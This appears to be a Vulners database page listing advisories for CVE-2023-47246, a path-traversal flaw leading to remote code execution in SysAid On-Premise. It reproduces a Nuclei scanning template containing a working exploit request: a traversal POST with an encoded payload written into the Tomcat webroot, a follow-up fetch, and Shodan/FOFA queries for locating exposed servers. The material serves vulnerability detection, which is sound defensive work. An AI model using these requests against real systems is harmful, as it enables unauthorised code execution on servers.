| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| Exploit for Path Traversal in Sysaid | 17 Nov 202307:03 | – | githubexploit | |
| Exploit for Path Traversal in Sysaid | 23 Nov 202405:21 | – | githubexploit | |
| CVE-2023-47246 | 10 Nov 202300:00 | – | attackerkb | |
| The vulnerability of the doPost method in the UserEntry class of the com.ilient.server package in the SysAid software for hardware and software support and control allows a perpetrator to execute arbitrary code. | 11 Nov 202300:00 | – | bdu_fstec | |
| CVE-2023-47246 | 9 Nov 202314:10 | – | circl | |
| SysAid Server Path Traversal Vulnerability | 13 Nov 202300:00 | – | cisa_kev | |
| CISA Adds Six Known Exploited Vulnerabilities to Catalog | 13 Nov 202312:00 | – | cisa | |
| Sysaid Technologies SysAid 安全漏洞 | 10 Nov 202300:00 | – | cnnvd | |
| File Upload Vulnerability Exists in SysAid On-Premise | 21 Nov 202300:00 | – | cnvd | |
| CVE-2023-47246 | 10 Nov 202300:00 | – | cve |
id: CVE-2023-47246
info:
name: SysAid Server - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.
remediation: |
Apply the latest security patches and updates from the vendor to address this vulnerability.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.
reference:
- https://www.huntress.com/blog/critical-vulnerability-sysaid-cve-2023-47246
- https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
- https://www.rapid7.com/blog/post/2023/11/09/etr-cve-2023-47246-sysaid-zero-day-vulnerability-exploited-by-lace-tempest/
- https://www.cisa.gov/news-events/alerts/2023/11/13/cisa-adds-six-known-exploited-vulnerabilities-catalog
- https://documentation.sysaid.com/docs/latest-version-installation-files
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-47246
cwe-id: CWE-22
epss-score: 0.98851
epss-percentile: 0.99921
cpe: cpe:2.3:a:sysaid:sysaid_on-premises:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: sysaid
product: sysaid_on-premises
shodan-query:
- http.favicon.hash:1540720428
- http.favicon.hash:"1540720428"
fofa-query: icon_hash="1540720428"
tags: cve,cve2023,sysaid,rce,kev,traversal,intrusive,vkev,vuln
variables:
directory: "{{rand_base(5)}}"
http:
- raw:
- |
POST /userentry?accountId=/../../../tomcat/webapps/{{directory}}/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{ hex_decode('789c0bf06666e16200819c8abcf02241510f4e201b84851864189cc35c758d0c8c8c754dcc8d4cccf44a2a4a42433819981fdb05a79e63f34b2dade0666064f9cac8c0c0023201a83a3ec43538842bc09b91498e1997b1126071a026862d8d506d1896b0422c41b320c09b950da2979121024887824d02000d3f1fcb') }}
- |
@timeout: 15
GET /{{directory}}/CVE-2023-47246.txt?{{wait_for(9)}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "contains(body_2,'CVE_TEST') && status_code_1==200 && status_code_2==200"
# digest: 4b0a0048304602210082ad34de171e12c877cb69d8571390d59fb0ac06eae24ce3c69a84c3bbe623a8022100f59f3ddb6ae93403cb51d266c68d41c8cf4869fc5a75a3166de8dd986c7bc311:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation